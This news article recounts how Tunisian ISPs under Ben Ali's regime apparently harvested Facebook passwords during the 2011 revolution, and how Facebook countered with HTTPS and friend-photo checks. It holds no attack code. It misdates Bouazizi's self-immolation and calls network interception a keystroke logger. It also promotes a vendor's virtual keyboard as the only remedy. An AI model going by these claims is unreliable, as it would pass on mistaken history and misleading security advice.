In recent weeks the world's eye have been collectively focused on the small North African country of Tunisia. When street vendor and university graduate Mohamed Bouazizi carried out his self immolation on the 10th of December, a wave of protests followed culminating in President Zine El Abidine Ben Ali being toppled from power.
Something which may not have been as obvious, is the role social networking sites Facebook and Twitter have played during the incident, serving as soap boxes for the masses to vent their anger and successfully carry out the revolution. Recently however reports surfaced indicating that these purveyors of free speech could have been used just as effectively against the populace it served.
According to Alexis Madrigal
from The Atlantic
, Ben Ali's regime was in the process of attempting to steal the Facebook passwords of an entire nation.
Facebook chief security officer Joe Sullivan said that they started noticing abnormal signs from Tunisia around Christmas Day last year. They had received several reports from users saying, “It looks like someone logged into my account and deleted it,” Sullivan said.
Thereafter Facebook's security team started looking into the reports, with Tunisia's former state internet censorship agency Ammar, pegged as the prime suspects. After more than ten days of investigating, Facebook realised the extent of the damage, Tunisian ISPs (internet service providers) had been running a piece of malicious code which recorded users log-in information when they visited sites such as Facebook.
By early January it was clear that almost an entire country's passwords has been compromised, prompting Sullivan's team to take action. “We've had to deal with ISPs in the past who have tried to filter or block our site. In this case, we were confronted by ISPs that were doing something unprecedented in that they were being very active in their attempts to intercept user information.”
The software being run by Tunisian ISPs was basically a country-wide keystroke logger, presumably feeding the passwords of all Tunisians to Ben Ali's corrupt regime. A keystroke logger is a type of malicious program that records the exact keystrokes of a user and can isolate users' passwords and email addresses based on the data it captures. The only real way of side-stepping such a program is by using a virtual keyboard, such as the one supplied with Kaspersky Internet Security 2011
To combat the problem, Sullivan's team launched a double pronged attack. Firstly, all Tunisian requests to connect to Facebook was routed to an https server (instead of http), which features stronger protocol encryption.
Secondly, to restore privacy to users whose passwords had already been stolen, the team employed a “roadblock” solution which asked users to identify their friends in a series of photos to determine whether they truly were the account holder.
The damage that can be inflicted from a password leak such as this is almost endless. While Facebook served as a portal though which to voice new opinions, in turn it could be used to identify exactly who was speaking out against the government, down to their name, the content of their Facebook messages, email and even their favourite movie.
While Facebook's fixes seem to have worked for the most part, Tunisians have also been successful in ousting its previous corrupt government in a revolution that seems to have spread throughout the Arab world
. It turns out Facebook can be the hero sometimes after all.